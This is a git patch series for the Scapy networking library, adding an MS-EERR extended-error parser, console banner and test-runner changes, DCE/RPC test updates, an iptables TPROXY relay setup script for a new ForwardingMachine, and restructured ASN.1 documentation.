1466: "OSF_CCONNECTION__SendBindPacket", + 1467: "OSF_CCONNECTION__SendBindPacket", + 1468: "OSF_CCONNECTION__SendBindPacket", + 1469: "OSF_CCONNECTION__SendBindPacket", + 1471: "LRPC_BASE_CCALL__HandlePipeChunk", + 1474: "LRPC_BASE_CCALL__HandlePipeChunk", + 1480: "LRPC_CASSOCIATION__AlpcCreateReservedMessage", + 1491: "LRPC_CASSOCIATION__AskForReservedMessage", + 1492: "LRPC_CASSOCIATION__AskForReservedMessage", + 1500: "LRPC_BASE_CCALL__CancelAsyncCall", + 1502: "LRPC_BASE_CCALL__HandlePipeFault", + 1510: "LRPC_BASE_CCALL__HandlePipePull", + 1520: "LRPC_SCALL__NotifyAssociationClosePending", + 1530: "LRPC_SCALL__AbortAsyncCall", + 1540: "BindToEpMapper", + 1550: "LRPC_BASE_CCALL__Send", + 1560: "LRPC_BASE_CCALL__Receive", + 1570: "LRPC_SASSOCIATION__NotifyAllActiveCalls", + 1580: "LRPC_SASSOCIATION__CleanupSparsePipes", + 1590: "LRPC_CCALL__CallbackSendReceive", + 1600: "LRPC_CALLBACK__SendReceiveLoop", + 1601: "LRPC_CALLBACK__SendReceiveLoop", + 1602: "LRPC_CALLBACK__SendReceiveLoop", + 1610: "OSF_SCALL__DoSecurityCallbackAndAccessCheck", + 1611: "OSF_SCALL__DoSecurityCallbackAndAccessCheck", + 1612: "OSF_SCALL__DoSecurityCallbackAndAccessCheck", + 1613: "OSF_SCALL__DoSecurityCallbackAndAccessCheck", + 1614: "OSF_SCALL__DoSecurityCallbackAndAccessCheck", + 1616: "OSF_SCALL__DoSecurityCallbackAndAccessCheck", + 1617: "OSF_SCALL__DoSecurityCallbackAndAccessCheck", + 1619: "OSF_SCALL__DoSecurityCallbackAndAccessCheck", + 1641: "LRPC_SCAUSAL_FLOW__MaybeQueueCall", + 1642: "LRPC_SCAUSAL_FLOW__MaybeQueueCall", + 1650: "LRPC_FAST_BIND_CCALL__ActualCancelCall", + 1660: "LRPC_FAST_BINDING_HANDLE__Bind", + 1670: "LRPC_CAUSAL_FLOW__SendNextCalls", + 1700: "CO_ConnectionThreadPoolCallback", + 1701: "CO_ConnectionThreadPoolCallback", + 1704: "CO_AddressThreadPoolCallback", + 1705: "CO_AddressThreadPoolCallback", + 1710: "OSF_CCONNECTION__ConnectionAborted", + 1720: "OSF_CCONNECTION__ProcessReceiveComplete", + 1730: "OSF_CCONNECTION__ProcessSendComplete", + 1740: "OSF_BINDING_HANDLE__AllocateCCall", + 1741: "OSF_BINDING_HANDLE__AllocateCCall", + 1750: "ProcessFaultPacket", + 3050: "OSF_CCONNECTION__AddCall", + 3080: "SECURITY_CONTEXT__GetWireIdForSnego", + 3081: "SECURITY_CONTEXT__GetWireIdForSnego", + 4000: "OSF_SCALL__FwFilter", + 4001: "OSF_SCALL__FwFilter", + 4002: "OSF_SCALL__FwFilter", + 4020: "LRPC_SCALL__ReallocPipeBuffer", + 4030: "LRPC_BASE_CCALL__HandleCancelMessage", + 4040: "LRPC_SCAUSAL_FLOW__RecordGapInFlow", + 4060: "NMP_BuildDefaultDaclForPipe", + 4061: "NMP_BuildDefaultDaclForPipe", + 4070: "NMP_SetSecurity", + 4072: "NMP_SetSecurity", + 4073: "NMP_BuildDefaultDaclForPipe", + 4077: "NMP_SetSecurity", + 4078: "NMP_SetSecurity", + 4200: "WS_ClientBind", + 4210: "OSF_SCALL__ProcessReceivedPDU", + 4222: "OSF_SCALL__EatAuthInfoFromPacket", + 4230: "RpcpConvertToLongRunning", + 4240: "LRPC_BASE_BINDING_HANDLE__EnableAsyncIfNecessary", + 4253: "LRPC_SYSTEM_HANDLE_DATA__AddSystemHandle", + 4256: "LRPC_SYSTEM_HANDLE_DATA__GetSystemHandle", + 4257: "LRPC_SYSTEM_HANDLE_DATA__GetSystemHandle", + 4272: "RpcpSystemHandleTypeSpecificWork", + 4273: "RpcpSystemHandleTypeSpecificWork", + 4274: "RpcpSystemHandleTypeSpecificWork", + 4291: "HVSOCKET_SetSocketOptions", +} + + +class DceRpc5ExtendedErrorInfo(Packet): + fields_desc = [ + NDRSerializeType1PacketField( + "extended_error", + ExtendedErrorInfo(), + ExtendedErrorInfo, + ) + ] + + def show(self) -> None: + """ + Print stacktrace + """ + # Get a list of ErrorInfo + cur = self.extended_error.value + errors = [cur] + while cur and cur.Next: + cur = cur.Next.value + errors.append(cur) + # Concatenate the ErrorInfos + timefld = UTCTimeField( + "", + None, + fmt=" str: ) -def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): - # type: (Optional[Any], Optional[Any], Optional[Any], int) -> None +def interact(mydict=None, + argv=None, + mybanner=None, + mybanneronly=False, + loglevel=logging.INFO): + # type: (Optional[Any], Optional[Any], Optional[Any], bool, int) -> None """ Starts Scapy's console. """ @@ -808,9 +812,6 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): banner_text = get_fancy_banner() else: banner_text = "Welcome to Scapy (%s)" % conf.version - if mybanner is not None: - banner_text += "\n" - banner_text += mybanner # Make sure the history file has proper permissions try: @@ -937,6 +938,12 @@ def ptpython_configure(repl): import bpython banner = banner_text + " using bpython %s" % bpython.__version__ + if mybanner is not None: + if mybanneronly: + banner = "" + banner += "\n" + banner += mybanner + # Start IPython or ptipython if conf.interactive_shell in ["ipython", "ptipython"]: banner += "\n" diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 6109a787a18..bd703869e74 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -10,7 +10,6 @@ import builtins import bz2 import copy -import code import getopt import glob import hashlib @@ -586,12 +585,14 @@ def run_campaign(test_campaign, get_interactive_session, theme, )[0] # Drop - def drop(scapy_ses): - code.interact(banner="Test '%s' failed. " - "exit() to stop, Ctrl-D to leave " - "this interpreter and continue " - "with the current test campaign" - % t.name, local=scapy_ses) + def drop(t, scapy_ses): + from scapy.main import interact + interact( + mybanner="Test '%s' failed.\n\n%s" % (t.name, t.output), + mybanneronly=True, + mydict=scapy_ses, + argv=[None, "-H"], + ) try: for i, testset in enumerate(test_campaign): @@ -602,7 +603,7 @@ def drop(scapy_ses): else: failed += 1 if drop_to_interpreter: - drop(scapy_ses) + drop(t, scapy_ses) test_campaign.duration += t.duration except KeyboardInterrupt: failed += 1 @@ -611,8 +612,6 @@ def drop(scapy_ses): test_campaign.interrupted = True if verb: print("Campaign interrupted!") - if drop_to_interpreter: - drop(scapy_ses) test_campaign.passed = passed test_campaign.failed = failed diff --git a/test/scapy/layers/dcerpc.uts b/test/scapy/layers/dcerpc.uts index 5a3ac0c7147..ac8ff483e62 100644 --- a/test/scapy/layers/dcerpc.uts +++ b/test/scapy/layers/dcerpc.uts @@ -6,7 +6,9 @@ import re from scapy.layers.dcerpc import * from uuid import UUID +old_debug_dissector = conf.debug_dissector conf.debug_dissector = 2 +True + Check EField @@ -211,12 +213,13 @@ class LPSHARE_INFO_1(NDRPacket): = DCE/RPC 5 NDR: Check user friendliness -pkt = LPSHARE_INFO_1(shi1_netname=b"ADMIN1$", ndr64=True) +pkt = LPSHARE_INFO_1(shi1_netname="ADMIN1$", ndr64=True) val = pkt.fields['shi1_netname'] assert isinstance(val, NDRPointer) assert isinstance(val.value, NDRConformantArray) assert isinstance(val.value.value[0], NDRVaryingArray) assert val.value.value[0].value == b"ADMIN1$" +assert pkt.valueof("shi1_netname") == b"ADMIN1$" = DCE/RPC 5 NDR: Try building it @@ -228,10 +231,11 @@ val = z.fields['shi1_netname'] assert val.value.max_count == 8 assert val.value.value[0].actual_count == 8 assert val.value.value[0].value == b"ADMIN1$" +assert z.valueof("shi1_netname") == b"ADMIN1$" = DCE/RPC 5 NDR: Same thing with NDR32 -pkt = LPSHARE_INFO_1(shi1_netname=b"ADMIN1$", ndr64=False) +pkt = LPSHARE_INFO_1(shi1_netname="ADMIN1$", ndr64=False) assert bytes(pkt) == b'\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00A\x00D\x00M\x00I\x00N\x001\x00$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' z = LPSHARE_INFO_1(bytes(pkt), ndr64=False) @@ -239,6 +243,7 @@ val = z.fields['shi1_netname'] assert val.value.max_count == 8 assert val.value.value[0].actual_count == 8 assert val.value.value[0].value == b"ADMIN1$" +assert z.valueof("shi1_netname") == b"ADMIN1$" + Real tests on complex packets @@ -249,8 +254,8 @@ assert val.value.value[0].value == b"ADMIN1$" class LPWKSTA_USER_INFO_0(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRFullPointerField( - NDRConfVarStrNullFieldUtf16("wkui0_username", ""), deferred=True + NDRFullEmbPointerField( + NDRConfVarStrNullFieldUtf16("wkui0_username", "") ) ] @@ -259,14 +264,13 @@ class LPWKSTA_USER_INFO_0_CONTAINER(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ NDRIntField("EntriesRead", 0), - NDRFullPointerField( + NDRFullEmbPointerField( NDRConfPacketListField( "Buffer", [LPWKSTA_USER_INFO_0()], LPWKSTA_USER_INFO_0, count_from=lambda pkt: pkt.EntriesRead, ), - deferred=True, ), ] @@ -274,17 +278,17 @@ class LPWKSTA_USER_INFO_0_CONTAINER(NDRPacket): class LPWKSTA_USER_INFO_1(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ - NDRFullPointerField( - NDRConfVarStrNullFieldUtf16("wkui1_username", ""), deferred=True + NDRFullEmbPointerField( + NDRConfVarStrNullFieldUtf16("wkui1_username", "") ), - NDRFullPointerField( - NDRConfVarStrNullFieldUtf16("wkui1_logon_domain", ""), deferred=True + NDRFullEmbPointerField( + NDRConfVarStrNullFieldUtf16("wkui1_logon_domain", "") ), - NDRFullPointerField( - NDRConfVarStrNullFieldUtf16("wkui1_oth_domains", ""), deferred=True + NDRFullEmbPointerField( + NDRConfVarStrNullFieldUtf16("wkui1_oth_domains", "") ), - NDRFullPointerField( - NDRConfVarStrNullFieldUtf16("wkui1_logon_server", ""), deferred=True + NDRFullEmbPointerField( + NDRConfVarStrNullFieldUtf16("wkui1_logon_server", "") ), ] @@ -293,14 +297,13 @@ class LPWKSTA_USER_INFO_1_CONTAINER(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ NDRIntField("EntriesRead", 0), - NDRFullPointerField( + NDRFullEmbPointerField( NDRConfPacketListField( "Buffer", [LPWKSTA_USER_INFO_1()], LPWKSTA_USER_INFO_1, count_from=lambda pkt: pkt.EntriesRead, - ), - deferred=True, + ) ), ] @@ -312,13 +315,12 @@ class LPWKSTA_USER_ENUM_STRUCT(NDRPacket): NDRUnionField( [ ( - NDRFullPointerField( + NDRFullEmbPointerField( NDRPacketField( "WkstaUserInfo", LPWKSTA_USER_INFO_0_CONTAINER(), LPWKSTA_USER_INFO_0_CONTAINER, ), - deferred=True, ), ( (lambda pkt: getattr(pkt, "Level", None) == 0), @@ -326,13 +328,12 @@ class LPWKSTA_USER_ENUM_STRUCT(NDRPacket): ), ), ( - NDRFullPointerField( + NDRFullEmbPointerField( NDRPacketField( "WkstaUserInfo", LPWKSTA_USER_INFO_1_CONTAINER(), LPWKSTA_USER_INFO_1_CONTAINER, ), - deferred=True, ), ( (lambda pkt: getattr(pkt, "Level", None) == 1), @@ -447,113 +448,47 @@ assert tower.floors[0].uuid = DCE/RPC 5 NDR: Test DEPORTED_CONFORMANTS with offsetted padding -# From [MS-EERR] - -class EEUString(NDRPacket): - ALIGNMENT = (4, 8) - fields_desc = [ - NDRSignedShortField("nLength", None, size_of="pString"), - NDRFullPointerField( - NDRConfStrLenFieldUtf16("pString", "", size_is=lambda pkt: pkt.nLength), - deferred=True, - ), - ] - - -class ExtendedErrorParamTypesInternal(IntEnum): - eeptiLongVal = 3 - - -class ExtendedErrorParam(NDRPacket): - ALIGNMENT = (8, 8) - fields_desc = [ - NDRInt3264EnumField("Type", 0, ExtendedErrorParamTypesInternal), - NDRUnionField( - [ - ( - NDRSignedIntField("value", 0), - ( - (lambda pkt: getattr(pkt, "Type", None) == 3), - (lambda _, val: val.tag == 3), - ), - ), - ], - StrFixedLenField("value", "", length=0), - align=(2, 8), - switch_fmt=("H", "I"), - ), - ] - - -class EEComputerNamePresent(IntEnum): - eecnpPresent = 1 - eecnpNotPresent = 2 - - -class EEComputerName(NDRPacket): - ALIGNMENT = (4, 8) - fields_desc = [ - NDRInt3264EnumField("Type", 0, EEComputerNamePresent), - NDRUnionField( - [ - ( - NDRPacketField("value", EEUString(), EEUString), - ( - (lambda pkt: getattr(pkt, "Type", None) == 1), - (lambda _, val: val.tag == 1), - ), - ), - ( - StrFixedLenField("value", "", length=0), - ( - (lambda pkt: getattr(pkt, "Type", None) == 2), - (lambda _, val: val.tag == 2), - ), - ), - ], - StrFixedLenField("value", "", length=0), - align=(2, 8), - switch_fmt=("H", "I"), - ), - ] - - -class ExtendedErrorInfo(NDRPacket): - ALIGNMENT = (8, 8) - DEPORTED_CONFORMANTS = ["Params"] - fields_desc = [ - NDRRecursiveField("Next"), - NDRPacketField("ComputerName", EEComputerName(), EEComputerName), - NDRIntField("ProcessID", 0), - NDRLongField("TimeStamp", 0), - NDRIntField("GeneratingComponent", 0), - NDRIntField("Status", 0), - NDRShortField("DetectionLocation", 0), - NDRShortField("Flags", 0), - NDRSignedShortField("nLen", None, size_of="Params"), - NDRConfPacketListField( - "Params", - [], - ExtendedErrorParam, - size_is=lambda pkt: pkt.nLen, - conformant_in_struct=True, - ), - ] - -pkt = ndr_deserialize1(b'\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x04\x00\x02\x00\x01\x00\x01\x00\x04\x00\x00\x00\x08\x00\x02\x00\xc0\x03\x00\x00\x00\x00\x00\x00\xa5\xcfq`,\xea\xd9\x01\x02\x00\x00\x00!\x07\x00\x00L\x06\x00\x00\x01\x00\x00\x00\x03\x00\x03\x00\xc4\xfe\xfc\x99\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x02\x00\xc0\x03\x00\x00\x00\x00\x00\x00)fo`,\xea\xd9\x01\x03\x00\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x03\x00\x00\x00\x03\x00\x03\x00\n\x00\x00\x00\x03\x00\x03\x00\x06\x00\x00\x00\x03\x00\x03\x00!\x07\x00\x00\x04\x00\x00\x00D\x00C\x001\x00\x00\x00\x00\x00\x00\x00', ExtendedErrorInfo) - -assert isinstance(pkt.value, ExtendedErrorInfo) -assert pkt.value.max_count == 1 -assert pkt.value.Next.value.ProcessID == 960 -assert pkt.value.Next.value.TimeStamp == 133395140301514281 -assert [x.Type for x in pkt.value.Next.value.Params] == [3, 3, 3] - -assert pkt.value.ComputerName.value.value.valueof("pString") == b'D\x00C\x001\x00\x00\x00' -assert pkt.value.ProcessID == 960 -assert pkt.value.TimeStamp == 133395140301672357 -assert pkt.value.Status == 1825 -assert pkt.value.DetectionLocation == 1612 -assert pkt.value.Params[0].Type == 3 +from scapy.layers.msrpce.mseerr import * + +pkt = DceRpc5ExtendedErrorInfo(b'\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x04\x00\x02\x00\x01\x00\x01\x00\x04\x00\x00\x00\x08\x00\x02\x00\xc0\x03\x00\x00\x00\x00\x00\x00\xa5\xcfq`,\xea\xd9\x01\x02\x00\x00\x00!\x07\x00\x00L\x06\x00\x00\x01\x00\x00\x00\x03\x00\x03\x00\xc4\xfe\xfc\x99\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x02\x00\xc0\x03\x00\x00\x00\x00\x00\x00)fo`,\xea\xd9\x01\x03\x00\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x03\x00\x00\x00\x03\x00\x03\x00\n\x00\x00\x00\x03\x00\x03\x00\x06\x00\x00\x00\x03\x00\x03\x00!\x07\x00\x00\x04\x00\x00\x00D\x00C\x001\x00\x00\x00\x00\x00\x00\x00', ExtendedErrorInfo) + +assert isinstance(pkt.extended_error.value, ExtendedErrorInfo) +assert pkt.extended_error.value.max_count == 1 +assert pkt.extended_error.value.Next.value.ProcessID == 960 +assert pkt.extended_error.value.Next.value.TimeStamp == 133395140301514281 +assert [x.Type for x in pkt.extended_error.value.Next.value.Params] == [3, 3, 3] + +assert pkt.extended_error.value.ComputerName.value.value.valueof("pString") == b'D\x00C\x001\x00\x00\x00' +assert pkt.extended_error.value.ProcessID == 960 +assert pkt.extended_error.value.TimeStamp == 133395140301672357 +assert pkt.extended_error.value.Status == 1825 +assert pkt.extended_error.value.DetectionLocation == 1612 +assert pkt.extended_error.value.Params[0].Type == 3 + += [MS-EERR] test show() + +with ContextManagerCaptureOutput() as cmco: + pkt.show() + result = cmco.get_output() + +EXPECTED = """# Extended Error Information +PID: 960 - 18/09/2023 12:33:50.167234 (1695040430) + | ComputerName: DC1\x00 + | Generating Component: Runtime + | Status: 1825 + | DetectionLocation: OSF_SCALL__DoSecurityCallbackAndAccessCheck + | Flags 0 + | Params: [('eeptiLongVal', 2583494340)] +PID: 960 - 18/09/2023 12:33:50.151428 (1695040430) + | Generating Component: Security Provider + | Status: STATUS_SUCCESS + | DetectionLocation: AcceptThirdLeg10 + | Flags 0 + | Params: [('eeptiLongVal', 10), ('eeptiLongVal', 6), ('eeptiLongVal', 1825)] +""" + +result +assert result.strip() == EXPECTED.strip() + [PASSIVE] Passive sniffing ~ passive @@ -623,8 +558,15 @@ conf.dcerpc_session_enable = False assert pkts[15].vt_trailer.commands[0].Command == 2 assert pkts[15].load == b'\x00\x00\x02\x00\x00\x00\x00\x00\x1a M\xe2\xd6O\xd1\x11\xa3\xda\x00\x00\xf8u\xae\r\x00\x00\x02\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -assert pkts[21].load == b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x05\x00\x13\x00\r5BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\x00\x87\x01\x00\t\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' -assert pkts[22].load == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x00\x00\x00\x00K\x00\x00\x00\x05\x00\x13\x00\r5BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\xc2\x03\x01\x00\t\x04\x00\xc0\xa8\x00d\x00\x00\x00\x00\x00' +assert pkts[21].obj.referent_id == 0x1 +assert pkts[21].map_tower.value.tower_octet_string == b'\x05\x00\x13\x00\r5BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\x00\x87\x01\x00\t\x04\x00\x00\x00\x00\x00' +assert pkts[21].max_towers == 4 + +assert pkts[22].num_towers == 1 +assert pkts[22].ITowers.max_count == 4 +assert pkts[22][ept_map_Response].valueof("ITowers")[0].max_count == 75 +assert pkts[22][ept_map_Response].valueof("ITowers")[0].tower_length == 75 +assert pkts[22][ept_map_Response].valueof("ITowers")[0].tower_octet_string == b'\x05\x00\x13\x00\r5BQ\xe3\x06K\xd1\x11\xab\x04\x00\xc0O\xc2\xdc\xd2\x04\x00\x02\x00\x00\x00\x13\x00\r\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x02\x00\x00\x00\x01\x00\x0b\x02\x00\x00\x00\x01\x00\x07\x02\x00\xc2\x03\x01\x00\t\x04\x00\xc0\xa8\x00d' + MS-RPC client and server @@ -1000,3 +942,9 @@ except OSError: pass rpcserver.close() + ++ Cleanup + += Restore conf.debug_dissector + +conf.debug_dissector = old_debug_dissector From d3863969621a026bf73695f8d61a20f679e3192b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 7 Jul 2025 15:08:47 +0200 Subject: [PATCH 1500/1632] ForwardingMachine + Cert() overhaul (#4784) * New: ForwardingMachine * Document forwarding machines, split Advanced Usage * Improve naming and forwarding machine * Add debug_strfixedlenfield * Cleanup Cert/Key handling a LOT * CI fixes * Fix TLS 1.3 exchange * Fix doc * Make pem format string instead of bytes --- doc/scapy/_static/vethrelay.sh | 74 ++ doc/scapy/advanced_usage.rst | 1216 ----------------------- doc/scapy/advanced_usage/asn1_snmp.rst | 485 +++++++++ doc/scapy/advanced_usage/automaton.rst | 376 +++++++ doc/scapy/advanced_usage/fwdmachine.rst | 133 +++ doc/scapy/advanced_usage/index.rst | 10 + doc/scapy/advanced_usage/pipetools.rst | 347 +++++++ doc/scapy/graphics/fwdmachine.drawio | 135 +++ doc/scapy/graphics/fwdmachine.svg | 3 + doc/scapy/index.rst | 2 +- scapy/config.py | 2 + scapy/fields.py | 4 +- scapy/fwdmachine.py | 498 ++++++++++ scapy/layers/tls/cert.py | 231 +++-- scapy/layers/tls/keyexchange_tls13.py | 4 +- scapy/supersocket.py | 19 +- test/scapy/layers/tls/cert.uts | 33 +- tox.ini | 3 +- 18 files changed, 2254 insertions(+), 1321 deletions(-) create mode 100755 doc/scapy/_static/vethrelay.sh delete mode 100644 doc/scapy/advanced_usage.rst create mode 100644 doc/scapy/advanced_usage/asn1_snmp.rst create mode 100644 doc/scapy/advanced_usage/automaton.rst create mode 100644 doc/scapy/advanced_usage/fwdmachine.rst create mode 100644 doc/scapy/advanced_usage/index.rst create mode 100644 doc/scapy/advanced_usage/pipetools.rst create mode 100644 doc/scapy/graphics/fwdmachine.drawio create mode 100644 doc/scapy/graphics/fwdmachine.svg create mode 100644 scapy/fwdmachine.py diff --git a/doc/scapy/_static/vethrelay.sh b/doc/scapy/_static/vethrelay.sh new file mode 100755 index 00000000000..0e62f7b4903 --- /dev/null +++ b/doc/scapy/_static/vethrelay.sh @@ -0,0 +1,74 @@ +#!/bin/bash + +# Setup iptables for IP relay by creating an interface configured +# to be the destination of TPROXY rules. + +if [ "$EUID" -ne 0 ] + then echo "Please run as root" + exit +fi + +if [ "$1" != "setup" ] && [ "$1" != "unsetup" ]; then + echo -e "Usage: ./vethrelay \n" + exit 1 +fi + +IFACE="vethrelay" +IP="2.2.2.2" + +# Linux doc about TPROXY and example regarding this: +# https://www.kernel.org/doc/Documentation/networking/tproxy.txt +# https://powerdns.org/tproxydoc/tproxy.md.html + +function checkSetup() { + iptables -t mangle -n --list "DIVERT" >/dev/null 2>&1 + return $? +} + +if [ "$1" == "setup" ]; then + # Add "DIVERT" chain if it doesn't exist + checkSetup + if [ $? -eq 0 ]; then + echo "vethrelay already setup !" + exit 1 + fi + # Create an interface tcpreplay dedicated to relay + ip link add dev $IFACE type dummy + sysctl net.ipv6.conf.$IFACE.disable_ipv6=1 >/dev/null + ip link set dev $IFACE up + ip addr add dev $IFACE $IP/32 + # Create mangle "DIVERT" chain as an optimisation. -m socket matches + # packets from already established sockets. Those are marked as 1 then + # accepted directly. + iptables -t mangle -N DIVERT + iptables -t mangle -A PREROUTING -p tcp -m socket -j DIVERT + iptables -t mangle -A DIVERT -j MARK --set-mark 1 + iptables -t mangle -A DIVERT -j ACCEPT + # Packets marked with 1 are routed through table 100 instead of the + # default routing table + ip rule add fwmark 1 lookup 100 + # In routing table 100, all IPs are local to 'vethrelay' + ip route add local 0.0.0.0/0 dev $IFACE table 100 + echo -e "\x1b[32mInterface $IFACE is now setup with IPv4: $IP !\x1b[0m\n" + echo -e "Add listening rules as follow:\n" + echo "# TPROXY incoming TCP packets on port 80 to $IFACE on port 8080" + echo "iptables -t mangle -A PREROUTING -p tcp --dport 80 -j TPROXY --tproxy-mark 0x1/0x1 --on-port 8080 --on-ip $IP" + echo + echo "# Listen on wlp4s0 for incoming packets on port 80 (on the interface where it really comes from)" + echo "iptables -A INPUT -i wlp4s0 -p tcp --dport 80 -j ACCEPT" +elif [ "$1" == "unsetup" ]; then + checkSetup + if [ $? -ne 0 ]; then + echo "vethrelay not setup !" + exit 1 + fi + # Remove all setup rules + sudo ip rule del fwmark 1 lookup 100 + sudo ip route del local 0.0.0.0/0 dev $IFACE table 100 + sudo iptables -t mangle -D DIVERT -j ACCEPT + sudo iptables -t mangle -D DIVERT -j MARK --set-mark 1 + sudo iptables -t mangle -D PREROUTING -p tcp -m socket -j DIVERT + sudo iptables -t mangle -X DIVERT + sudo ip link del dev $IFACE + echo -e "\x1b[32mInterface $IFACE unsetup !\x1b[0m" +fi diff --git a/doc/scapy/advanced_usage.rst b/doc/scapy/advanced_usage.rst deleted file mode 100644 index 29053c10561..00000000000 --- a/doc/scapy/advanced_usage.rst +++ /dev/null @@ -1,1216 +0,0 @@ -************** -Advanced usage -************** - -ASN.1 and SNMP -============== - -What is ASN.1? --------------- - -.. note:: - - This is only my view on ASN.1, explained as simply as possible. For more theoretical or academic views, I'm sure you'll find better on the Internet. - -ASN.1 is a notation whose goal is to specify formats for data exchange. It is independent of the way data is encoded. Data encoding is specified in Encoding Rules. - -The most used encoding rules are BER (Basic Encoding Rules) and DER (Distinguished Encoding Rules). Both look the same, but the latter is specified to guarantee uniqueness of encoding. This property is quite interesting when speaking about cryptography, hashes, and signatures. - -ASN.1 provides basic objects: integers, many kinds of strings, floats, booleans, containers, etc. They are grouped in the so-called Universal class. A given protocol can provide other objects which will be grouped in the Context class. For example, SNMP defines PDU_GET or PDU_SET objects. There are also the Application and Private classes. - -Each of these objects is given a tag that will be used by the encoding rules. Tags from 1 are used for Universal class. 1 is boolean, 2 is an integer, 3 is a bit string, 6 is an OID, 48 is for a sequence. Tags from the ``Context`` class begin at 0xa0. When encountering an object tagged by 0xa0, we'll need to know the context to be able to decode it. For example, in SNMP context, 0xa0 is a PDU_GET object, while in X509 context, it is a container for the certificate version. - -Other objects are created by assembling all those basic brick objects. The composition is done using sequences and arrays (sets) of previously defined or existing objects. The final object (an X509 certificate, a SNMP packet) is a tree whose non-leaf nodes are sequences and sets objects (or derived context objects), and whose leaf nodes are integers, strings, OID, etc. - -Scapy and ASN.1 ---------------- - -Scapy provides a way to easily encode or decode ASN.1 and also program those encoders/decoders. It is quite laxer than what an ASN.1 parser should be, and it kind of ignores constraints. It won't replace neither an ASN.1 parser nor an ASN.1 compiler. Actually, it has been written to be able to encode and decode broken ASN.1. It can handle corrupted encoded strings and can also create those. - -ASN.1 engine -^^^^^^^^^^^^ - -Note: many of the classes definitions presented here use metaclasses. If you don't look precisely at the source code and you only rely on my captures, you may think they sometimes exhibit a kind of magic behavior. -`` -Scapy ASN.1 engine provides classes to link objects and their tags. They inherit from the ``ASN1_Class``. The first one is ``ASN1_Class_UNIVERSAL``, which provide tags for most Universal objects. Each new context (``SNMP``, ``X509``) will inherit from it and add its own objects. - -:: - - class ASN1_Class_UNIVERSAL(ASN1_Class): - name = "UNIVERSAL" - # [...] - BOOLEAN = 1 - INTEGER = 2 - BIT_STRING = 3 - # [...] - - class ASN1_Class_SNMP(ASN1_Class_UNIVERSAL): - name="SNMP" - PDU_GET = 0xa0 - PDU_NEXT = 0xa1 - PDU_RESPONSE = 0xa2 - - class ASN1_Class_X509(ASN1_Class_UNIVERSAL): - name="X509" - CONT0 = 0xa0 - CONT1 = 0xa1 - # [...] - -All ASN.1 objects are represented by simple Python instances that act as nutshells for the raw values. The simple logic is handled by ``ASN1_Object`` whose they inherit from. Hence they are quite simple:: - - class ASN1_INTEGER(ASN1_Object): - tag = ASN1_Class_UNIVERSAL.INTEGER - - class ASN1_STRING(ASN1_Object): - tag = ASN1_Class_UNIVERSAL.STRING - - class ASN1_BIT_STRING(ASN1_STRING): - tag = ASN1_Class_UNIVERSAL.BIT_STRING - -These instances can be assembled to create an ASN.1 tree:: - - >>> x=ASN1_SEQUENCE([ASN1_INTEGER(7),ASN1_STRING("egg"),ASN1_SEQUENCE([ASN1_BOOLEAN(False)])]) - >>> x - , , ]]>]]> - >>> x.show() - # ASN1_SEQUENCE: - - - # ASN1_SEQUENCE: - - -Encoding engines 